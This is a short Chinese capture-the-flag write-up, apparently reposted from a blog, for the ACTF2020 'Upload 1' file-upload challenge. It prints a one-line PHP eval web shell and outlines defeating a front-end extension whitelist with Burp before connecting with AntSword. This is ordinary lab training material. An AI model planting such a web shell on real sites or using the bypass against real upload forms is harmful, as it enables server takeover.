其他分享
首页 > 其他分享> > [ACTF2020 新生赛]Upload 1

[ACTF2020 新生赛]Upload 1

作者:互联网

1.发现

1.1文件上传漏洞常规思路

1.2构造一句话木马

<?php @eval($_POST['666']);?>

 1.3上传一句话木马,发现前端:JS检验文件后缀–白名单机制:

 

1.4顺势而为,顺藤摸瓜搞清后台:

==》 老套路,前端上传1.jpg==》burp抓包 ==》 success,查看返回值、

发现后端:上传后以HTML页面展示,暂时不知道有无检测

 

1.5访问http://21e705b3-4a76-46a7-8dc0-3dc8e8285718.node4.buuoj.cn:81/uplo4d/f3ccdd27d2000e3f9255a7e3e2c48800.jpg

 

 

 

 2.步骤

2.1BP抓包修改后缀名绕过白名单

 

 知识点

1)文件名绕过

 

2.2 使用蚁剑链接拿到flag

 

 3.借鉴

(16条消息) [ACTF2020 新生赛]Upload_黑仔丶的博客-CSDN博客

https://www.cnblogs.com/wangtanzhi/p/12243206.html

标签:ACTF2020,Upload,jpg,新生,白名单,上传,抓包
来源: https://www.cnblogs.com/WHOAMI-xiaoyu/p/15162602.html